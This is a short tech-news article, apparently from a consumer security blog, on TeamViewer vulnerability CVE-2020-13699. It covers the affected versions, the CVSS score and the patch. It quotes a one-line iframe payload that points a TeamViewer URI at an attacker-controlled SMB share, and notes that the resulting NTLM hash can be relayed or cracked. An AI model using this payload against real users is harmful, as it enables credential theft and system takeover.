Security flaw CVE-2020-13699 found in TeamViewer app allows an attacker to gain complete access to a target system
TeamViewer is a proprietary software application for remote control, desktop sharing, online meetings, web conferencing and file transfer between computers. It is an amazing tool that helps users to share their desktops when they are stuck somewhere and also can be accessed by the receiver. But the researchers have discovered that the TeamViewer for Windows is vulnerable to allow remote attackers to crack users’ passwords and lead to a further takeover.
The discovery of the flaw was spotted due to the increase in the work from home policies and share their work remotely. The vulnerability was tracked as CVE-2020-13699 and received a score of 8.8/10 on the Common Vulnerability Scoring System (CVSS) scale.
The security flaw in the app was discovered as an unquoted search path or element – more specifically, it’s due to the application not properly quoting its custom URI handlers – and could be exploited when the system with a vulnerable version of TeamViewer installed visits a maliciously crafted website.
According to the research, the security flaw is active on the following TeamViewer versions for Windows desktops prior to 8.0.258861, 9.0.258860, 10.0.258873, 11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350 and 15.8.3.
”An attacker could embed a malicious iframe in a website with a crafted URL (<iframe src=’teamviewer10: –play \\attacker-IP\share\fake.tvs’>) that would launch the TeamViewer Windows desktop client and force it to open a remote SMB share.” Jeffrey Hofmann, the researcher who discovered the flaw.
As the researcher learned the exploitation of the security flaw can be initiated remotely and requires no previous authentication. The flaw seems ideal for targeted watering hole attacks. There is no indication that this vulnerability is being exploited in the wild and no public exploit is currently available.
Windows will perform NTLM authentication when opening the SMB share and that request can be relayed (using a tool like responder) for code execution (or captured for hash cracking). This affects the URI handlers teamviewer10, teamviewer8, teamviewerapi, tvchat1, tvcontrol1, tvfiletransfer1, tvjoinv8, tvpresent1, tvsendfile1, tvsqcustomer1, tvsqsupport1, tvvideocall1, and tvvpn1.
However, the researcher also said that there was no exploitation of the flaw yet spotted and was soon informed to the company at the time of discovery. TeamViewer has already fixed the bug and released the patched version. It is also recommended to update your Teamviewer app as soon as possible to avoid the flaw. For more news on tech and cybersecurity stay tuned on Android Rookies by subscribing to our newsletter from here.